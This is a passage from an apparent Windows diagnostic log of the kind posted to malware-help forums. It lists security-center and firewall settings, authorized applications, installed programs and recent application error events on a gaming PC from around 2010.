    "AntiVirusOverride" = 1
    "FirewallOverride" = 0

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

    ========== System Restore Settings ==========

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
    "DisableSR" = 0

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sr]
    "Start" = 0

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SrService]
    "Start" = 2

    ========== Firewall Settings ==========

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
    "57184:TCP" = 57184:TCP:*:Enabled:pando Media Booster
    "57184:UDP" = 57184:UDP:*:Enabled:pando Media Booster

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "EnableFirewall" = 1
    "DoNotAllowExceptions" = 0
    "DisableNotifications" = 0

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
    "1900:UDP" = 1900:UDP:LocalSubNet:Enabled:@xpsp2res.dll,-22007
    "2869:TCP" = 2869:TCP:LocalSubNet:Enabled:@xpsp2res.dll,-22008
    "3724:TCP" = 3724:TCP:*:Enabled:Blizzard Downloader: 3724
    "5353:TCP" = 5353:TCP:*:Enabled:Adobe CSI CS4
    "8378:TCP" = 8378:TCP:*:Enabled:League of Legends Launcher
    "8378:UDP" = 8378:UDP:*:Enabled:League of Legends Launcher
    "8379:TCP" = 8379:TCP:*:Enabled:League of Legends Launcher
    "8379:UDP" = 8379:UDP:*:Enabled:League of Legends Launcher
    "8380:TCP" = 8380:TCP:*:Enabled:League of Legends Launcher
    "8380:UDP" = 8380:UDP:*:Enabled:League of Legends Launcher
    "8381:TCP" = 8381:TCP:*:Enabled:League of Legends Launcher
    "8381:UDP" = 8381:UDP:*:Enabled:League of Legends Launcher
    "57184:TCP" = 57184:TCP:*:Enabled:pando Media Booster
    "57184:UDP" = 57184:UDP:*:Enabled:pando Media Booster

    ========== Authorized Applications List ==========

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
    "C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe" = C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe:*:Enabled:Windows Live Sync -- (Microsoft Corporation)
    "C:\Program Files\Pando Networks\Media Booster\PMB.exe" = C:\Program Files\Pando Networks\Media Booster\PMB.exe:*:Enabled:pando Media Booster -- ()

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "C:\Program Files\Steam\Steam.exe" = C:\Program Files\Steam\Steam.exe:*:Enabled:Steam -- (Valve Corporation)
    "C:\Program Files\Steam\steamapps\common\stalker shadow of chernobyl\bin\XR_3DA.exe" = C:\Program Files\Steam\steamapps\common\stalker shadow of chernobyl\bin\XR_3DA.exe:*:Enabled:S.T.A.L.K.E.R.: Shadow of Chernobyl -- File not found
    "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" = C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe:*:Disabled:Malwarebytes' Anti-Malware -- (Malwarebytes Corporation)
    "F:\Program Files\Bethesda Softworks\Fallout 3\Fallout3.exe" = F:\Program Files\Bethesda Softworks\Fallout 3\Fallout3.exe:*:Disabled:Fallout3 -- File not found
    "C:\Program Files\Bethesda Softworks\Fallout 3\Fallout3.exe" = C:\Program Files\Bethesda Softworks\Fallout 3\Fallout3.exe:*:Disabled:Fallout3 -- File not found
    "C:\Program Files\Steam\steamapps\earl_yoist\team fortress 2\hl2.exe" = C:\Program Files\Steam\steamapps\earl_yoist\team fortress 2\hl2.exe:*:Enabled:hl2 -- ()
    "F:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe" = F:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe:*:Disabled:The Sims 2 -- File not found
    "F:\Program Files\BitLord\BitLord.exe" = F:\Program Files\BitLord\BitLord.exe:*:Enabled:BitLord -- File not found
    "C:\Program Files\StarCraft II\StarCraft II.exe" = C:\Program Files\StarCraft II\StarCraft II.exe:*:Enabled:Blizzard Launcher -- (Blizzard Entertainment)
    "C:\Program Files\StarCraft II\Support\BlizzardDownloader.exe" = C:\Program Files\StarCraft II\Support\BlizzardDownloader.exe:*:Enabled:Blizzard Downloader -- (Blizzard Entertainment)
    "C:\Program Files\StarCraft II\Versions\Base15405\SC2.exe" = C:\Program Files\StarCraft II\Versions\Base15405\SC2.exe:*:Enabled:StarCraft II -- (Blizzard Entertainment, Inc.)
    "C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" = C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe:*:Enabled:Adobe CSI CS4 -- (Adobe Systems Incorporated)
    "C:\Program Files\Ventrilo\Ventrilo.exe" = C:\Program Files\Ventrilo\Ventrilo.exe:*:Enabled:Ventrilo.exe -- (Flagship Industries, Inc.)
    "F:\Riot Games\League of Legends\air\LolClient.exe" = F:\Riot Games\League of Legends\air\LolClient.exe:*:Enabled:League of Legends Lobby -- File not found
    "F:\Riot Games\League of Legends\game\League of Legends.exe" = F:\Riot Games\League of Legends\game\League of Legends.exe:*:Enabled:League of Legends Game Client -- File not found
    "C:\Program Files\Steam\steamapps\common\alien swarm\srcds.exe" = C:\Program Files\Steam\steamapps\common\alien swarm\srcds.exe:*:Enabled:Alien Swarm Dedicated Server -- ()
    "C:\Program Files\Steam\steamapps\earl_yoist\day of defeat source\hl2.exe" = C:\Program Files\Steam\steamapps\earl_yoist\day of defeat source\hl2.exe:*:Enabled:Day of Defeat: Source -- File not found
    "C:\Program Files\Steam\steamapps\common\alien swarm\swarm.exe" = C:\Program Files\Steam\steamapps\common\alien swarm\swarm.exe:*:Enabled:Alien Swarm -- ()
    "C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe" = C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe:*:Enabled:Windows Live Sync -- (Microsoft Corporation)
    "C:\Riot Games\League of Legends\air\LolClient.exe" = C:\Riot Games\League of Legends\air\LolClient.exe:*:Enabled:League of Legends Lobby -- (Adobe Systems Inc.)
    "C:\Riot Games\League of Legends\game\League of Legends.exe" = C:\Riot Games\League of Legends\game\League of Legends.exe:*:Enabled:League of Legends Game Client -- ()
    "C:\Program Files\Steam\steamapps\earl_yoist\garrysmod\hl2.exe" = C:\Program Files\Steam\steamapps\earl_yoist\garrysmod\hl2.exe:*:Enabled:Garry's Mod -- File not found
    "C:\Program Files\Steam\steamapps\earl_yoist\counter-strike source\hl2.exe" = C:\Program Files\Steam\steamapps\earl_yoist\counter-strike source\hl2.exe:*:Enabled:Counter-Strike: Source -- ()
    "C:\Program Files\Electronic Arts\Crytek\Crysis\Bin32\Crysis.exe" = C:\Program Files\Electronic Arts\Crytek\Crysis\Bin32\Crysis.exe:*:Enabled:Crysis_32 -- (Crytek GmbH)
    "C:\Program Files\Electronic Arts\Crytek\Crysis\Bin32\CrysisDedicatedServer.exe" = C:\Program Files\Electronic Arts\Crytek\Crysis\Bin32\CrysisDedicatedServer.exe:*:Enabled:CrysisDedicatedServer_32 -- (Crytek GmbH)
    "F:\Program Files\Riot Games\League of Legends\air\LolClient.exe" = F:\Program Files\Riot Games\League of Legends\air\LolClient.exe:*:Enabled:League of Legends Lobby -- File not found
    "F:\Program Files\Riot Games\League of Legends\game\League of Legends.exe" = F:\Program Files\Riot Games\League of Legends\game\League of Legends.exe:*:Enabled:League of Legends Game Client -- File not found
    "C:\Program Files\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe" = C:\Program Files\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe:*:Enabled:Ubisoft Game Launcher -- File not found
    "C:\Program Files\Steam\steamapps\earl_yoist\source sdk base 2007\hl2.exe" = C:\Program Files\Steam\steamapps\earl_yoist\source sdk base 2007\hl2.exe:*:Enabled:hl2 -- File not found
    "C:\Program Files\StarCraft II\Versions\Base16939\SC2.exe" = C:\Program Files\StarCraft II\Versions\Base16939\SC2.exe:*:Enabled:StarCraft II -- (Blizzard Entertainment, Inc.)
    "C:\Program Files\iTunes\iTunes.exe" = C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes -- (Apple Inc.)
    "C:\Program Files\Pando Networks\Media Booster\PMB.exe" = C:\Program Files\Pando Networks\Media Booster\PMB.exe:*:Enabled:pando Media Booster -- ()
    "C:\Program Files\Steam\steamapps\common\left 4 dead 2\left4dead2.exe" = C:\Program Files\Steam\steamapps\common\left 4 dead 2\left4dead2.exe:*:Enabled:Left 4 Dead 2 -- ()
    "C:\Program Files\Steam\steamapps\common\left 4 dead\left4dead.exe" = C:\Program Files\Steam\steamapps\common\left 4 dead\left4dead.exe:*:Enabled:Left 4 Dead -- ()


    ========== HKEY_LOCAL_MACHINE Uninstall List ==========

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
    "{000E79B7-E725-4F01-870A-C12942B7F8E4}" = Crysis(R)
    "{00ADFB20-AE75-46F4-AD2C-F48B15AC3100}" = Adobe Color NA Recommended Settings CS4
    "{048298C9-A4D3-490B-9FF9-AB023A9238F3}" = Steam
    "{05308C4E-7285-4066-BAE3-6B50DA6ED755}" = Adobe Update Manager CS4
    "{098727E1-775A-4450-B573-3F441F1CA243}" = kuler
    "{0A0CADCF-78DA-33C4-A350-CD51849B9702}" = Microsoft .NET Framework 4 Extended
    "{0D6013AB-A0C7-41DC-973C-E93129C9A29F}" = Adobe Color JA Extra Settings CS4
    "{0D67A4E4-5BE0-4C9A-8AD8-AB552B433F23}" = Adobe Setup
    "{0F723FC1-7606-4867-866C-CE80AD292DAF}" = Adobe CSI CS4
    "{1618734A-3957-4ADD-8199-F973763109A8}" = Adobe Anchor Service CS4
    "{16E6D2C1-7C90-4309-8EC4-D2212690AAA4}" = AdobeColorCommonSetRGB
    "{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
    "{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Windows Live Upload Tool
    "{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
    "{26A24AE4-039D-4CA4-87B4-2F83216020FF}" = Java(TM) 6 Update 21
    "{2A981294-F14C-4F0F-9627-D793270922F8}" = Bonjour
    "{2BD5C305-1B27-4D41-B690-7A61172D2FEB}" = Macromedia Flash 8
    "{308B6AEA-DE50-4666-996D-0FA461719D6B}" = Apple Mobile Device Support
    "{3175E049-F9A9-4A3D-8F19-AC9FB04514D1}" = Windows Live Communications Platform
    "{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
    "{35D94F92-1D3A-43C5-8605-EA268B1A7BD9}" = PDF Settings CS4
    "{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}" = McAfee SiteAdvisor
    "{3A4E8896-C2E7-4084-A4A4-B8FD1894E739}" = Adobe XMP Panels CS4
    "{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
    "{3D2C9DE6-9ADE-4252-A241-E43723B0CE02}" = Adobe Color - Photoshop Specific CS4
    "{3D4D4CBF-79F3-4E38-A1DC-30646F030443}" = Microsoft LifeChat
    "{3DA8DF9A-044E-46C4-8531-DEDBB0EE37FF}" = Adobe WinSoft Linguistics Plugin
    "{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}" = erLT
    "{3F425F12-3A1B-4511-97B2-E2BB4701B745}" = Crysis Wars(R)
    "{45338B07-A236-4270-9A77-EBB4115517B5}" = Windows Live Sign-in Assistant
    "{474F25F5-BDC9-40E5-B1B6-F6BF23FC106F}" = Windows Live Essentials
    "{4943EFF5-229F-435D-BEA9-BE3CAEA783A7}" = Adobe Service Manager Extension
    "{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
    "{5546CDB5-2CE2-498B-B059-5B3BF81FC41F}" = Macromedia Extension Manager
    "{5570C7F0-43D0-4916-8A9E-AEDD52FA86F4}" = Adobe Color EU Extra Settings CS4
    "{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}" = Microsoft Office Live Add-in 1.3
    "{63C24A08-70F3-4C8E-B9FB-9F21A903801D}" = Adobe Color Video Profiles CS CS4
    "{63E5CDBF-8214-4F03-84F8-CD3CE48639AD}" = Adobe Photoshop CS4 Support
    "{6530EB5E-F2BE-45D3-906B-E4AFFF2D1588}" = Windows Live Device Manager
    "{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}" = PowerDVD
    "{68243FF8-83CA-466B-B2B8-9F99DA5479C4}" = AdobeColorCommonSetCMYK
    "{716E0306-8318-4364-8B8F-0CC4E9376BAC}" = MSXML 4.0 SP2 Parser and SDK
    "{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
    "{7353BAE6-5E49-46C4-A9B5-8A269A313789}" = Crysis WARHEAD(R)
    "{789289CA-F73A-4A16-A331-54D498CE069F}" = Ventrilo Client
    "{820D3F45-F6EE-4AAF-81EF-CE21FF21D230}" = Adobe Type Support CS4
    "{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
    "{83877DB1-8B77-45BC-AB43-2BAC22E093E0}" = Adobe Bridge CS4
    "{842B4B72-9E8F-4962-B3C1-1C422A5C4434}" = Suite Shared Configuration CS4
    "{888F1505-C2B3-4FDE-835D-36353EBD4754}" = Ubisoft Game Launcher
    "{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
    "{8BF2C401-02CE-424D-BC26-6C4F9FB446B6}" = Macromedia Flash 8 Video Encoder
    "{8FB1B528-E260-451E-9B55-E9152F94B80B}" = Microsoft Games for Windows - LIVE Redistributable
    "{90120000-0010-0409-0000-0000000FF1CE}" = Microsoft Software Update for Web Folders (English) 12
    "{90120000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2007
    "{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2007
    "{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2007
    "{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2007
    "{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2007
    "{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2007
    "{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
    "{90120000-001F-0409-0000-0000000FF1CE}_ENTERPRISE_{ABDDE972-355B-4AF1-89A8-DA50B7B5C045}" = Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2)
    "{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
    "{90120000-001F-040C-0000-0000000FF1CE}_ENTERPRISE_{F580DDD5-8D37-4998-968E-EBB76BB86787}" = Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2)
    "{90120000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2007
    "{90120000-001F-0C0A-0000-0000000FF1CE}_ENTERPRISE_{187308AB-5FA7-4F14-9AB9-D290383A10D9}" = Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2)
    "{90120000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2007
    "{90120000-0030-0000-0000-0000000FF1CE}" = Microsoft Office Enterprise 2007
    "{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{3D019598-7B59-447A-80AE-815B703B84FF}" = Security Update for Microsoft Office system 2007 (972581)
    "{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{926CC8AE-8414-43DF-8EB4-CF26D9C3C663}" =
    "{90120000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2007
    "{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2007
    "{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{DE5A002D-8122-4278-A7EE-3121E7EA254E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2007
    "{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2007
    "{90120000-00BA-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0114-0409-0000-0000000FF1CE}" = Microsoft Office Groove Setup Metadata MUI (English) 2007
    "{90120000-0114-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2007
    "{90120000-0115-0409-0000-0000000FF1CE}_ENTERPRISE_{DE5A002D-8122-4278-A7EE-3121E7EA254E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2007
    "{90120000-0117-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{92606477-9366-4D3B-8AE3-6BE4B29727AB}" = League of Legends
    "{931AB7EA-3656-4BB7-864D-022B09E3DD67}" = Adobe Linguistics CS4
    "{94D398EB-D2FD-4FD1-B8C4-592635E8A191}" = Adobe CMaps CS4
    "{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
    "{980A182F-E0A2-4A40-94C1-AE0C1235902E}" = Pando Media Booster
    "{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
    "{9E2BD6FF-CE8D-47B5-AD9C-0A5C2D54EB3C}" = League of Legends
    "{A1F66FC9-11EE-4F2F-98C9-16F8D1E69FB7}" = Segoe UI
    "{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
    "{A87B11AC-4344-4E5D-8B12-8F471A87DAD9}" = LightScribe 1.4.136.1
    "{AC76BA86-7AD7-1033-7B44-A94000000001}" = Adobe Reader 9.4.1
    "{B10914FD-8812-47A4-85A1-50FCDE7F1F33}" = Windows Live Sync
    "{B2544A03-10D0-4E5E-BA69-0362FFC20D18}" = OGA Notifier 2.0.0048.0
    "{B28B351F-1232-46EA-85EF-B8EA91641033}" = Nero 7 Essentials
    "{B29AD377-CC12-490A-A480-1452337C618D}" = Connect
    "{B2FE1952-0186-46c3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = NVIDIA Control Panel 260.99
    "{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Graphics Driver 260.99
    "{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NView" = NVIDIA nView 135.36
    "{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX" = NVIDIA PhysX System Software 9.10.0514
    "{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver" = NVIDIA HD Audio Driver 1.1.9.0
    "{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application
    "{B57EAFF2-D6EE-4C6C-9175-ED9F17BFC1BC}" = Windows Live Messenger
    "{B65BA85C-0A27-4BC0-A22D-A66F0E5B9494}" = Adobe Photoshop CS4
    "{B9CA59A0-3B70-48F8-9054-67595DE6E72B}" = League of Legends
    "{B9DB4C76-01A4-46D5-8910-F7AA6376DBAF}" = NVIDIA PhysX
    "{BAF78226-3200-4DB4-BE33-4D922A799840}" = Windows Presentation Foundation
    "{BB4E33EC-8181-4685-96F7-8554293DEC6A}" = Adobe Output Module
    "{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
    "{C301D681-00D3-4597-8446-3DE54FE20F1A}" = TortoiseSVN 1.6.11.20210 (32 bit)
    "{C41300B9-185D-475E-BFEC-39EF732F19B1}" = Apple Software Update
    "{C52E3EC1-048C-45E1-8D53-10B0C6509683}" = Adobe Default Language CS4
    "{CC75AB5C-2110-4A7F-AF52-708680D22FE8}" = Photoshop Camera Raw
    "{CD95D125-2992-4858-B3EF-5F6FB52FBAD6}" = Skype Toolbars
    "{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
    "{D9D1A2FD-56B2-4F21-B959-745FE43CAB8C}" = Vegas Pro 9.0
    "{E4848436-0345-47E2-B648-8B522FCDA623}" = Adobe Photoshop CS4
    "{E6158D07-2637-4ECF-B576-37C489669174}" = Windows Live Call
    "{E633D396-5188-4E9D-8F6B-BFB8BF3467E8}" = Skype™ 5.0
    "{E7004147-2CCA-431C-AA05-2AB166B9785D}" = QuickTime
    "{EE39FFBD-544E-49E4-A999-6819828EAE91}" = Windows Live Photo Gallery
    "{EE6097DD-05F4-4178-9719-D3170BF098E8}" = Apple Application Support
    "{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
    "{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard
    "{F0E64E2E-3A60-40D8-A55D-92F6831875DA}" = Adobe Search for Help
    "{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
    "{F4F4F84E-804F-4E9A-84D7-C34283F0088F}" = RealUpgrade 1.0
    "{F8EF2B3F-C345-4F20-8FE4-791A20333CD5}" = Adobe ExtendScript Toolkit CS4
    "{F93C84A6-0DC6-42AF-89FA-776F7C377353}" = Adobe PDF Library Files CS4
    "{F97E3841-CA9D-4964-9D64-26066241D26F}" = Microsoft Games for Windows - LIVE
    "{FAE36873-1941-4076-A9A5-48812B5EA0B7}" = iTunes
    "{FC7E8851-BE97-4367-A253-D34FC7367998}" = X-Mouse Button Control (32bit Version)
    "{FCDD51BB-CAD0-4BB1-B7DF-CE86D1032794}" = Adobe Fonts All
    "{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
    "Adobe Flash Player Plugin" = Adobe Flash Player 10 Plugin
    "Adobe_faf656ef605427ee2f42989c3ad31b8" = Adobe Photoshop CS4
    "Any Video Converter_is1" = Any Video Converter 3.0.7
    "Audacity_is1" = Audacity 1.2.6
    "CCleaner" = CCleaner
    "Crysis Wars(R)" = Crysis Wars(R)
    "ENTERPRISE" = Microsoft Office Enterprise 2007
    "ESET Online Scanner" = ESET Online Scanner v3
    "Game Booster_is1" = Game Booster
    "Halo" = Microsoft Halo
    "KLiteCodecPack_is1" = K-Lite Codec Pack 5.8.3 (Full)
    "Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware
    "Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
    "Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
    "Microsoft .NET Framework 4 Extended" = Microsoft .NET Framework 4 Extended
    "Mozilla Firefox (3.6.12)" = Mozilla Firefox (3.6.12)
    "Mplayer.com" = Mplayer.com
    "NVIDIA Drivers" = NVIDIA Drivers
    "NVIDIA nView Desktop Manager" = NVIDIA nView Desktop Manager
    "PeerGuardian_is1" = PeerGuardian 2.0
    "Pocket Tanks1.3" = Pocket Tanks
    "PunkBusterSvc" = PunkBuster Services
    "RealPlayer 12.0" = RealPlayer
    "RocketDock_is1" = RocketDock 1.3.5
    "sp6" = Logitech SetPoint 6.20
    "StarCraft II" = StarCraft II
    "Steam App 500" = Left 4 Dead
    "Steam App 510" = Left 4 Dead Dedicated Server
    "Steam App 550" = Left 4 Dead 2
    "Steam App 630" = Alien Swarm
    "Windows Media Format Runtime" = Windows Media Format Runtime
    "Windows Media Player" = Windows Media Player 11
    "WinLiveSuite_Wave3" = Windows Live Essentials
    "WinRAR archiver" = WinRAR archiver
    "WMFDist11" = Windows Media Format 11 runtime
    "wmp11" = Windows Media Player 11
    "Xilisoft MKV Converter" = Xilisoft MKV Converter
    "XpsEPSC" = XML Paper Specification Shared Components Pack 1.0
    "YInstHelper" = Yahoo! Install Manager

    ========== HKEY_CURRENT_USER Uninstall List ==========

    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
    "{974C4B12-4D02-4879-85E0-61C95CC63E9E}" = Fallout 3
    "Crysis WARHEAD(R)" = Crysis WARHEAD(R)

    ========== Last 10 Event Log Errors ==========

    [ Application Events ]
    Error - 27/10/2010 5:35:33 AM | Computer Name = MARSHALL-D40729 | Source = Microsoft Office 12 | ID = 1000
    Description = Faulting application winword.exe, version 12.0.6545.5000, stamp 4c653e57,
    faulting module msvcr80.dll, version 8.0.50727.4053, stamp 4a594c79, debug? 0,
    fault address 0x00015108.

    Error - 27/10/2010 5:35:56 AM | Computer Name = MARSHALL-D40729 | Source = Microsoft Office 12 | ID = 1000
    Description = Faulting application winword.exe, version 12.0.6545.5000, stamp 4c653e57,
    faulting module msvcr80.dll, version 8.0.50727.4053, stamp 4a594c79, debug? 0,
    fault address 0x00015108.

    Error - 27/10/2010 5:36:17 AM | Computer Name = MARSHALL-D40729 | Source = Microsoft Office 12 | ID = 2001
    Description = Rejected Safe Mode action : Microsoft Office Word.

    Error - 27/10/2010 6:49:40 AM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application hl2.exe, version 0.0.0.0, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

    Error - 28/10/2010 7:23:44 AM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application hl2.exe, version 0.0.0.0, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

